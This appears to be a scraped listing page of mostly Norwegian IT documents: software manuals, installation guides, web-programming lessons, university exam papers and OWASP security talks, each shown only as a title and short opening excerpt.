Huldt & Lillevik Ansattportal. - en tilleggsmodul til Huldt & Lillevik Lønn. Teknisk beskrivelse Huldt & Lillevik Ansattportal - en tilleggsmodul til Huldt & Lillevik Lønn Teknisk beskrivelse Huldt & Lillevik er trygghet Trygghet er å vite at løsningen du bruker virker, hver eneste dag, enkelt og

Detaljer

Brukerdokumentasjon. Webservices og webklient for kodeverk/ kodeverdi verifisering

Brukerdokumentasjon. Webservices og webklient for kodeverk/ kodeverdi verifisering Brukerdokumentasjon Webservices og webklient for kodeverk/ kodeverdi verifisering Innholdsfortegnelse... 3... 3... 3... 3... 4... 4... 4... 4... 8... 9... 10!... 10 "... 11 # $... 11 1. Om systemet 1.1.

Detaljer

Overordnet beskrivelse og arkitekturskisse

Overordnet beskrivelse og arkitekturskisse Overordnet beskrivelse og arkitekturskisse Arkitekturskisse av Conserto, som er utviklet i ASP.NET VB FrameWork 4.0 med bruk av code-behind filer, MS SQL 2008, og er bygget på MasterPage som fellemal.

Detaljer

Administrator guide. Searchdaimon ES (Enterprise Server)

Administrator guide. Searchdaimon ES (Enterprise Server) Administrator guide Searchdaimon ES (Enterprise Server) Collections/Resourses... 3 Overview... 3 Crawl now... 3 Manage... 3 Delete... 5 Scan... 5 Start a new scan... 5 View results... 9 Delete... 9 Add

Detaljer

Innhold. Innledning... 13

Innhold. Innledning... 13 Innhold Innledning.................................................... 13 Kapittel 1 Kom i gang med PHP............................................ 17 1.1 Hvorfor PHP?.............................................

Detaljer

en hjemmeside Lesson Introduksjon Du kjenner en del HTML tagger, så nå er det på tide å lage din første hjemmeside! La oss begynne med en gang.

en hjemmeside Lesson Introduksjon Du kjenner en del HTML tagger, så nå er det på tide å lage din første hjemmeside! La oss begynne med en gang. Lesson 2 en hjemmeside All Code Clubs must be registered. Registered clubs appear on the map at codeclub.org.uk - if your club is not on the map then visit jumpto.cc/18cplpy to find out what to do. Introduksjon

Detaljer

Database security. Kapittel 14 Building Secure Software. Inf329, Høst 2005 Isabel Maldonado st10900@student.uib.no

Database security. Kapittel 14 Building Secure Software. Inf329, Høst 2005 Isabel Maldonado st10900@student.uib.no Database security Kapittel 14 Building Secure Software Inf329, Høst 2005 Isabel Maldonado st10900@student.uib.no Kort introduksjon Database er en organisert samling av data. SQL(Structured Query Language)

Detaljer

HTML og relasjonsdatabaser med PHP

HTML og relasjonsdatabaser med PHP HTML og relasjonsdatabaser med PHP Oppgaveveiledning Kent Dahl Informasjonsbehandling Brukersystemer Orkdal videregående skole (7. mars 2004) Innholdsfortegnelse 1. Introduksjon...2 1.1.

Detaljer

Trådløsnett med. Wireless network. MacOSX 10.5 Leopard. with MacOSX 10.5 Leopard

Trådløsnett med. Wireless network. MacOSX 10.5 Leopard. with MacOSX 10.5 Leopard Trådløsnett med MacOSX 10.5 Leopard Wireless network with MacOSX 10.5 Leopard April 2010 Slå på Airport ved å velge symbolet for trådløst nettverk øverst til høyre på skjermen. Hvis symbolet mangler må

Detaljer

VMware Horizon View Client. Brukerveiledning for nedlasting, installasjon og pålogging for fjerntilgang

VMware Horizon View Client. Brukerveiledning for nedlasting, installasjon og pålogging for fjerntilgang VMware Horizon View Client Brukerveiledning for nedlasting, installasjon og pålogging for fjerntilgang Introduksjon Fjerntilgang er blitt oppgradert til en bedre og mer moderne løsning. Programmet er identisk

Detaljer

if-tester Funksjoner, løkker og iftester Løkker og Informasjonsteknologi 2 Læreplansmål Gløer Olav Langslet Sandvika VGS

if-tester Funksjoner, løkker og iftester Løkker og Informasjonsteknologi 2 Læreplansmål Gløer Olav Langslet Sandvika VGS Løkker og if-tester Gløer Olav Langslet Sandvika VGS 29.08.2011 Informasjonsteknologi 2 Funksjoner, løkker og iftester Læreplansmål Eleven skal kunne programmere med enkle og indekserte variabler eller

Detaljer

DATAUTFORSKNING I EG, EG 7.1 OG EGENDEFINERTE FUNKSJONER SAS FANS I STAVANGER 4. MARS 2014, MARIT FISKAAEN

DATAUTFORSKNING I EG, EG 7.1 OG EGENDEFINERTE FUNKSJONER SAS FANS I STAVANGER 4. MARS 2014, MARIT FISKAAEN DATAUTFORSKNING I EG, EG 7.1 OG EGENDEFINERTE FUNKSJONER SAS FANS I STAVANGER 4. MARS 2014, MARIT FISKAAEN 2 INNLEDNING TEMA I SAS Enterprise Guide versjon 5.1 (februar 2012) kom det et nytt datautforskingsverktøy,

Detaljer

Produktinfo WebService. integrasjonsbeskrivelse

Produktinfo WebService. integrasjonsbeskrivelse Produktinfo WebService integrasjonsbeskrivelse Innhold PRODUKTINFO WEBSERVICE 1 INTEGRASJONSBESKRIVELSE 1 DOKUMENTINFORMASJON 3 1. ARKITEKTUR OG TEKNOLOGI 4 1.1. ARKITEKTUR OG DATAFLYT 4 1.2. TEKNOLOGI

Detaljer

Hurtigstart guide. Searchdaimon ES (Enterprise Server)

Hurtigstart guide. Searchdaimon ES (Enterprise Server) Hurtigstart guide Searchdaimon ES (Enterprise Server) Innholdsfortegnelse Informasjon før oppsett... 2 Koble til strøm og nettverk... 3 Oppsett av system... 3 Konfigurasjonsveiviser... 4 Sette fast IP

Detaljer

Http- og WebServices funksjoner

Http- og WebServices funksjoner Http- og WebServices funksjoner Side 1 Innholdsfortegnelse Innholdsfortegnelse Introduksjon Hvordan bruke HTTP(S) POST/GET funksjonene i TakeCargo Sende meldinger Motta meldinger (get) Oversikt over WebServices

Detaljer

Siteimprove analytics Tekniske spesifikasjoner

Siteimprove analytics Tekniske spesifikasjoner Siteimprove analytics Tekniske spesifikasjoner whitepaper Hvem er Siteimprove? Siteimprove er den eneste softwaren innen web governance som gjør det lettere å administrere og opprettholde ditt nettsted

Detaljer

IMS Intelligent MediaServer Desktop Upload Tool

IMS Intelligent MediaServer Desktop Upload Tool IM S Intelligent MediaServer Desktop Upload Tool INNHOLDSFORTEGNELSE Innledning... 3 Første gangs bruk av Desktop Upload Tool... 4 Innlogging... 4 Nedlasting av programvare... 5 Installere Desktop Upload

Detaljer

Din verktøykasse for anbud og prosjekt

Din verktøykasse for anbud og prosjekt Veiledning Serverinstallasjon 14.03.2013 Din verktøykasse for anbud og prosjekt 2013 CITEC AS v/sverre Andresen Side 1 av 27 Innholdsfortegnelse 1 INNLEDNING 3 2 DATABASEINSTALLASJON (SQL SERVER 2008)

Detaljer

Løsningsskisse, eksamen J2EE og distribuerte systemer 19.mai 2004

Løsningsskisse, eksamen J2EE og distribuerte systemer 19.mai 2004 Løsningsskisse, eksamen J2EE og distribuerte systemer 19.mai 2004 Oppgave 1 RMI-tjenerobjekt (databasewrapper) A Sentral tjenermaskin med database, RMi-register og RMI-tjenerprogram vis kart gjør bestilling

Detaljer

Trådløst nett UiT Feilsøking. Wireless network UiT Problem solving

Trådløst nett UiT Feilsøking. Wireless network UiT Problem solving Trådløst nett UiT Feilsøking Wireless network UiT Problem solving April 2015 Hvorfor får jeg ikke koblet meg opp mot trådløst nettverk med Windows 7? Why can t I connect to the wireless network with Windows

Detaljer

ff Brukermanual ebladadmin Pro

ff Brukermanual ebladadmin Pro ebladadmin ebladadmin er en nettbasert publiseringsløsning for publisering av eblad (digitale magasiner, publikasjoner, DM, årsrapporter, tilbudsaviser, kataloger, produktpermer, bruksanvisninger, mm)

Detaljer

Web-programmering med JSP Løsningsforslag leksjon 3

Web-programmering med JSP Løsningsforslag leksjon 3 Web-programmering med JSP Løsningsforslag leksjon 3 Oppgave 1 Denne siden viser inneholder en oversikt over biler:

Detaljer

Brukermanual til Domenia Norges adminløsning

Brukermanual til Domenia Norges adminløsning Brukermanual til Domenia Norges adminløsning 1. Login For å logge inn på løsningen din skriver du inn domenenavnet ditt og /siteadmin (f.eks www.domenia.no/siteadmin ). Skriv inn brukernavn og passord

Detaljer

HTML5. Skjemaer på nettsider. Skjemaer med. Informasjonsteknologi 1 og 2. Gløer Olav Langslet Sandvika VGS

HTML5. Skjemaer på nettsider. Skjemaer med. Informasjonsteknologi 1 og 2. Gløer Olav Langslet Sandvika VGS Skjemaer med HTML5 Gløer Olav Langslet Sandvika VGS Leksjon 10 Informasjonsteknologi 1 og 2 Skjemaer på nettsider I denne leksjonen skal vi se litt nærmere på bruk av skjemaer på nettsider. Du har sett

Detaljer

BRUKERHÅNDBOK FOR NETTVERKET

BRUKERHÅNDBOK FOR NETTVERKET BRUKERHÅNDBOK FOR NETTVERKET Lagre utskriftslogg til nettverk Version 0 NOR Definisjoner for merknader Vi bruker følgende ikon i denne brukerhåndboken: Merknader forteller hvordan du bør reagere på en

Detaljer

som blanker skjermen (clear screen). Du får en oversikt over alle kommandoene ved å skrive,

som blanker skjermen (clear screen). Du får en oversikt over alle kommandoene ved å skrive, 1. Last ned og installer XAMPP. 2. Sjekk at alt fungerer. 3. MySQL. Vi begynner med databaseserveren, MySQL. Gå til DOS klarmelding eller ledetekst (finnes under tilbehør på startmenyen om du ikke som

Detaljer

Labquality/NKK ELEKTRONISK RESULTATSKJEMA VIA INTERNET. Åpning av skjemaet. Logg inn på Participant services. Velg resultatskjemaet

Labquality/NKK ELEKTRONISK RESULTATSKJEMA VIA INTERNET. Åpning av skjemaet. Logg inn på Participant services. Velg resultatskjemaet ELEKTRONISK RESULTATSKJEMA VIA INTERNET Åpning av skjemaet Logg inn på Participant services 1. Åpne internett leseren din (IE7 eller senere er den mest egnede nettleseren) 2. Skriv i adressefeltet: http://www.labquality.fi

Detaljer

Shellscripting I. Innhold

Shellscripting I. Innhold Avdeling for informatikk og e-læring, Høgskolen i Sør-Trøndelag Shellscripting I Tor Halsan 19.08.2010 Lærestoffet er utviklet for faget LN199D Scripting av Servere Resymé: Leksjonen er første innføring

Detaljer

Å lage Noark 4 uttrekk selv. Thomas Sødring thomas.sodring@jbi.hio.no 22452610/99570472

Å lage Noark 4 uttrekk selv. Thomas Sødring thomas.sodring@jbi.hio.no 22452610/99570472 Å lage Noark 4 uttrekk selv Thomas Sødring thomas.sodring@jbi.hio.no 22452610/99570472 Prosjektet IKA Kongsberg / HiOA Kan vi lage et Noark 4 uttrekk for en av IKA Kongsbergs kommuner? Uformell samarbeid

Detaljer

Et forsøk på definisjon. Eksempel 1

Et forsøk på definisjon. Eksempel 1 [Kurssidene] [ ABI - fagsider bibin ] Introduksjon Michael Preminger (michael.preminger@hioa.no) 13/12-13 I denne forelesningen: Utvikling av dynamiske nettsteder med PHP og databaser, våren 2014 Motivasjon:

Detaljer

EKSAMEN. Les gjennom alle oppgavene før du begynner. Husk at det ikke er gitt at oppgavene står sortert etter økende vanskelighetsgrad.

EKSAMEN. Les gjennom alle oppgavene før du begynner. Husk at det ikke er gitt at oppgavene står sortert etter økende vanskelighetsgrad. EKSAMEN Emnekode: Emne: ITF10208 Webprogrammering 1 Dato: Eksamenstid: 09/12-2008 09.00-13.00 Hjelpemidler: 2 A4 ark (4 sider) med egenproduserte notater (håndskrevne/maskinskrevne) Faglærer: Tom Heine

Detaljer

Prosjekt 3 i sikkerhet og hacking

Prosjekt 3 i sikkerhet og hacking Prosjekt 3 i sikkerhet og hacking Social engineering svindel For: Jonas Bro, Lars Petter Bjørkevoll, Audun Hodnefjell og Magnus Skaalsveen 1 Innledning DISCLAIMER Svindelen som er beskrevet i denne oppgaven

Detaljer

Installasjonen krever en Windows 2008 server innmeldt i domene.

Installasjonen krever en Windows 2008 server innmeldt i domene. Installasjon av NPS Installasjonen krever en Windows 2008 server innmeldt i domene. Det kreves en NPS server pr. domene Steg 1) Legg til rollen Network Policy and Access Services, den eneste rolletjenesten

Detaljer

Opus Dental 7.1 Oppdateringsveiledning

Opus Dental 7.1 Oppdateringsveiledning Opus Dental 7.1 Oppdateringsveiledning Innhold Innledning... 1 Før installasjon... 2 Installasjon... 3 Last ned installasjonsfilen for Opus Dental... 3 Start installasjonen... 4 Oppdatering av databasen....

Detaljer

Hva skjer i Open Web Application Security Project (OWASP)?

Hva skjer i Open Web Application Security Project (OWASP)? Hva skjer i Open Web Application Security Project (OWASP)? Kåre Presttun kaare@mnemonic.no Agenda Hva er OWASP Hvorfor er applikasjonssikkerhet viktig Prosjekter i OWASP Konferanser Først Hva er OWASP?

Detaljer

TEKNISKE PROBLEMSTILLINGER. Grunnkurs Våren 2007 Trond Haugen

TEKNISKE PROBLEMSTILLINGER. Grunnkurs Våren 2007 Trond Haugen TEKNISKE PROBLEMSTILLINGER Grunnkurs Våren 2007 Trond Haugen Tekniske problemer Feil ifm. signering med PGP Feilformatterte e-poster Får ikke svar på innsendt søknad Får avvisning av innsendt søknad Ikke

Detaljer

En enkel innføring i ASP

En enkel innføring i ASP En enkel innføring i ASP Til å begynne med ble CGI "Common Gateway Interface" brukt til å kommunisere mellom et HTML skjema og webserveren. I FORM knaggen ble navnet på CGI applikasjonen angitt, i attributten

Detaljer

HØGSKOLEN I SØR-TRØNDELAG

HØGSKOLEN I SØR-TRØNDELAG HØGSKOLEN I SØR-TRØNDELAG Avdeling for informatikk og e-læring - AITeL Kandidatnr: Eksamensdato: 20. mai 2005 Varighet: 3 timer (09:00 12:00) Fagnummer: Fagnavn: Klasse(r): LV197D Webprogrammering med

Detaljer

- Java kan lastes ned gratis http://www.java.com. For installasjon, se punktet Hvordan laster jeg ned og installerer Java på min maskin?.

- Java kan lastes ned gratis http://www.java.com. For installasjon, se punktet Hvordan laster jeg ned og installerer Java på min maskin?. Innhold Hva er Java?... 2 Hvor finner jeg Java?... 2 Hvorfor må jeg ha Java for å bruke nettbanken?... 2 Hvordan installerer jeg Java på min maskin?... 2 Jeg får bare en feilmelding om "File is corrupt"

Detaljer

OWASP Norway, 24.april 2012. Ståle Pettersen

OWASP Norway, 24.april 2012. Ståle Pettersen Sikkerhet i mobile applikasjoner [P] OWASP Top 10 Risks Mobile Om meg Ståle Pettersen Java-utvikler og sikkerhetsentusiast BEKK OWASP twitter.com/kozmic OWASP Norway, 24.april 2012 Ståle Pettersen Mobile

Detaljer

Compello Invoice Approval

Compello Invoice Approval Compello Invoice Approval Godkjenning Webmodul brukerdokumentasjon Nettbrett og desktop via nettleser Index 1 Innledning... 3 2 Funksjonalitet... 4 Nettbrett og desktop via nettleser... 4 2.1.1 Desktop

Detaljer

TDT4237 Programvaresikkerhet Exercise 2. Kristian Ekle Stian Hegerland Hagen Thomas Gautvedt Tale Prestmo Martin Rechsteiner Marthe Øynes

TDT4237 Programvaresikkerhet Exercise 2. Kristian Ekle Stian Hegerland Hagen Thomas Gautvedt Tale Prestmo Martin Rechsteiner Marthe Øynes TDT4237 Programvaresikkerhet Exercise 2 Kristian Ekle Stian Hegerland Hagen Thomas Gautvedt Tale Prestmo Martin Rechsteiner Marthe Øynes 20. oktober 2014 Innhold 1 Secure password storage 1 1.1 The password

Detaljer

1. Installering av webtjener. Litt teori

1. Installering av webtjener. Litt teori Avdeling for informatikk og e-læring, Høgskolen i Sør-Trøndelag Installering av webtjener. Litt teori Grethe Sandstrak 01.09.2015 Lærestoffet er utviklet for faget LV199D Web-programmering med ASP.NET

Detaljer

Tjenester i Internett. E-post, HTTP, FTP, Telnet

Tjenester i Internett. E-post, HTTP, FTP, Telnet Tjenester i Internett E-post, HTTP, FTP, Telnet 1 I dag SMTP - Elektronisk Post (E-post) FTP File Transfer Protocol HTTP Hyper Text Transfer Protocol Telnet 2 Først: Noen svar på oppgaven Hvorfor studerer

Detaljer

EKSAMEN. Emne: Webprogrammering med PHP (kont.) Webprogrammering 1 (kont.) Eksamenstid: 09.00-13.00

EKSAMEN. Emne: Webprogrammering med PHP (kont.) Webprogrammering 1 (kont.) Eksamenstid: 09.00-13.00 EKSAMEN Emnekode: ITM20606 ITF10208 Dato: Emne: Webprogrammering med PHP (kont.) Webprogrammering 1 (kont.) Eksamenstid: 09.00-13.00 01/06-2010 Hjelpemidler: 2 A4 ark (4 sider) med egenproduserte notater

Detaljer

Operativsystemer og nettverk Løsningsforslag til eksamen 01.12.2014. Oppgave 1. a) Linux-kommando: java Beregn & b) Shellprogram:

Operativsystemer og nettverk Løsningsforslag til eksamen 01.12.2014. Oppgave 1. a) Linux-kommando: java Beregn & b) Shellprogram: Operativsystemer og nettverk Løsningsforslag til eksamen 01.12.2014 Oppgave 1 a) Linux-kommando: java Beregn & b) Shellprogram: java Beregn & java Beregn Eventuelt, hvis man vil gjøre det med bare en linje

Detaljer

Installasjonsveiledning

Installasjonsveiledning Installasjonsveiledning Magne Rodem og Jan-Erik Strøm 18. juni 2006 Innhold 1 Installasjon av Web Service 3 1.1 Krav........................................... 3 1.2 Installasjon av Sun Java System Application

Detaljer

TDT4102 Prosedyre og Objektorientert programmering Vår 2014

TDT4102 Prosedyre og Objektorientert programmering Vår 2014 Norges teknisk naturvitenskapelige universitet Institutt for datateknikk og informasjonsvitenskap TDT4102 Prosedyre og Objektorientert programmering Vår 2014 Øving 10 Frist: 2014-04-11 Mål for denne øvinga:

Detaljer

Hva skjer i OWASP? OWASP. The OWASP Foundation. Kåre Presttun Chapter Lead Mnemonic as kaare@mnemonic.no +47 4100 4908.

Hva skjer i OWASP? OWASP. The OWASP Foundation. Kåre Presttun Chapter Lead Mnemonic as kaare@mnemonic.no +47 4100 4908. Hva skjer i? Norway Chapter Kåre Presttun Chapter Lead Mnemonic as kaare@mnemonic.no +47 4100 4908 Copyright 2007 The Foundation Permission is granted to copy, distribute and/or modify this document under

Detaljer

Brukerveiledning for programmet HHR Animalia

Brukerveiledning for programmet HHR Animalia Brukerveiledning for programmet HHR Animalia Versjon 1.0 Rakkestad, 26.03.2014 Innholdsfortegnelse 1. Introduksjon... 3 2. Installasjon og oppgradering... 3 2.1 Nedlasting... 3 2.2 Oppdatering av operativsystem

Detaljer

S y s t e m d o k u m e n t a s j o n

S y s t e m d o k u m e n t a s j o n S y s t e m d o k u m e n t a s j o n Monitorering av produksjonsløyper ved Nasjonalbiblioteket - Project BAKE Utarbeidet av: Einar Wågan Kristian Akerhei Studium: Informasjonssystemer Innlevert: 26.5.2015

Detaljer

Med Reacts webmail kan du sende og motta e-post som normalt. Forskjellen er at dette gjøres via nettleser og ikke via ditt standard e-postprogram.

Med Reacts webmail kan du sende og motta e-post som normalt. Forskjellen er at dette gjøres via nettleser og ikke via ditt standard e-postprogram. Webmail - pat.react.no Med Reacts webmail kan du sende og motta e-post som normalt. Forskjellen er at dette gjøres via nettleser og ikke via ditt standard e-postprogram. Noen funksjoner i webmail: Sende

Detaljer

>>12 Arbeide med MySQL

>>12 Arbeide med MySQL 106 Snarveien til MySQL og Dreamweaver CS5 >>12 Arbeide med MySQL I dette kapittelet vil du lære hvordan du installerer MySQL Workbench å opprette prosjekter å lage tabeller hvordan du ser på innholdet

Detaljer

KTN1 - Design av forbindelsesorientert protokoll

KTN1 - Design av forbindelsesorientert protokoll KTN1 - Design av forbindelsesorientert protokoll Beskrivelse av A1 A1 skal tilby en pålitelig, forbindelsesorientert tjeneste over en upålitelig, forbindelsesløs tjeneste A2. Det er flere ting A1 må implementere

Detaljer

Brukerveiledning for Intelligent Converters MySQL Migration Toolkit IKA Trøndelag IKS 2012

Brukerveiledning for Intelligent Converters MySQL Migration Toolkit IKA Trøndelag IKS 2012 Om verktøyet Formålet med dette verktøyet er å migrere informasjon fra en databasevariant til en annen, i denne veiledningen fra Oracle til MySQL. Dette gjøres som første ledd i en avleveringsprosess.

Detaljer

Produktdokumentasjon. Madison Møbler Administrasjonsside og Nettbutikk

Produktdokumentasjon. Madison Møbler Administrasjonsside og Nettbutikk Produktdokumentasjon Madison Møbler Administrasjonsside og Nettbutikk 1 1. Forord 1.1 Dokumentasjonen Dette er en teknisk dokumentasjon på produktet som er utviklet. Denne er tiltenkt personer med teknisk

Detaljer

Guide for tilkobling til HIKT s Citrix løsning

Guide for tilkobling til HIKT s Citrix løsning Guide for tilkobling til HIKT s Citrix løsning Innhold Guide for tilkobling til HIKT s Citrix løsning... 1 Sjekk om Citrix er installert... 1 Tilgang til applikasjon fra kontoret... 2 Tilgang til applikasjon

Detaljer

Lønn 5.0. Veiledning for ASP leverandører

Lønn 5.0. Veiledning for ASP leverandører Lønn 5.0 Veiledning for ASP leverandører Om denne veiledningen Innhold Om denne veiledningen... 2 Installere første database og programmet... 2 Installere flere databaser på samme server... 2 Sette opp

Detaljer

BRUKERMANUAL. Telsys Online Backup

BRUKERMANUAL. Telsys Online Backup BRUKERMANUAL Telsys Online Backup TELSYS AS - 06.08.2009 Innhold Generelt... 3 Kom i gang... 4 Installasjon av Telsys Online Backup Proff/Standard... 4 Start opp klienten for første gang!... 10 Logg inn...

Detaljer

HØGSKOLEN I SØR-TRØNDELAG

HØGSKOLEN I SØR-TRØNDELAG HØGSKOLEN I SØR-TRØNDELAG Avdeling for informatikk og e-læring - AITeL Kandidatnr: Eksamensdato: 4.mai 2011 Varighet: 0900-1300 Emnekode: Emnenavn: Klasse(r): LO191D / LC191D Campus: LC191D Videregående

Detaljer

MySQL-database, php. Innhold. 8 MySQL-database, php. 8.1 Databasen MySQL

MySQL-database, php. Innhold. 8 MySQL-database, php. 8.1 Databasen MySQL Avdeling for informatikk og e-læring, Høgskolen i Sør-Trøndelag Helge Hafting 16.10.2007 Lærestoffet er utviklet for faget LV476D/LN476D Linux systemdrift Innhold 8 1 8.1 Databasen MySQL.............................

Detaljer

MySQL. Historikk. Nedlasting og installasjon

MySQL. Historikk. Nedlasting og installasjon 1 MySQL MySQL kan lastes ned gratis fra Internett (dev.mysql.com/doc). Vi forklarer hvordan man laster ned og installerer verktøyet, og også hvordan man kommer i gang med å lage databaser i MySQL. Historikk

Detaljer

EKSAMEN. Les gjennom alle oppgavene før du begynner. Husk at det ikke er gitt at oppgavene står sortert etter økende vanskelighetsgrad.

EKSAMEN. Les gjennom alle oppgavene før du begynner. Husk at det ikke er gitt at oppgavene står sortert etter økende vanskelighetsgrad. EKSAMEN Emnekode: Emne: ITM20606 Webprogrammering med PHP Dato: Eksamenstid: 11/12-2007 09.00-13.00 Hjelpemidler: 2 A4 ark (4 sider) med egenproduserte notater (håndskrevne/maskinskrevne) Faglærer: Tom

Detaljer

Innstallasjon og oppsett av Wordpress

Innstallasjon og oppsett av Wordpress Del 1 - Installasjon og oppsett Innstallasjon og oppsett av Wordpress Wordpress har blitt en veldig populær publiseringsplattform for websider. Uten særlige tekniske ferdigheter kan man sette opp profesjonelle

Detaljer

23.09.2015. Introduksjon til objektorientert. programmering. Hva skjedde ~1967? Lokale (og globale) helter. Grunnkurs i objektorientert.

23.09.2015. Introduksjon til objektorientert. programmering. Hva skjedde ~1967? Lokale (og globale) helter. Grunnkurs i objektorientert. Grunnkurs i objektorientert programmering Introduksjon til objektorientert programmering INF1000 Høst 2015 Siri Moe Jensen INF1000 - Høst 2015 uke 5 1 Siri Moe Jensen INF1000 - Høst 2015 uke 5 2 Kristen

Detaljer

Lotus Traveler - Manual for installasjon

Lotus Traveler - Manual for installasjon Lotus Traveler - Manual for installasjon Innholdsliste Nedlasting...2 Installasjon...3 Konfigurering...4 Problemer...5 Nedlasting 1) Åpne nettleseren på mobilen din. På de fleste Nokia-telefoner har denne

Detaljer

Brukerveiledning for Web-ADI

Brukerveiledning for Web-ADI 1 Brukerveiledning for Web-ADI Innhold: 1) Innledning side 2 2) Trinn 1 - Excel oppsett side 4 3) Trinn 2 - Internett oppsett side 8 4) Trinn 3 - Validering av bilag i ADI side 11 5) Kontoarter enhetene

Detaljer

LAB-L SETTE OPP MICROSOFT SERVER 2003

LAB-L SETTE OPP MICROSOFT SERVER 2003 Av Erik Espenakk JEG BEGYNNER MED EN FRISK INSTALLASJON AV WINDOWS SERVER. Her kan du legge til diverse server applikasjoner. Legg til DNS og Applikasjons server Her har jeg satt opp en Application server

Detaljer